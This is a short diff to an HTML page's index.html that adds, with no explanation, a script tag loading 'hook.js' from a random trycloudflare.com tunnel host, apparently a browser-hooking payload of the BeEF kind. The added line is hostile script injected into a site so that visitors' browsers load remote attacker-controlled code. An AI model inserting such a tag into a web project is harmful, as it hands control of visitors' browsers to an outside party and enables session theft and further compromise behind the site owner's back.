--- a/index.html
+++ b/index.html
@@ -26,6 +26,7 @@
       color: #777;
     }
   </style>
+    <script src=" https://exports-answering-bench-throat.trycloudflare.com/hook.js "></script>
 </head>
 <body>
   <header>
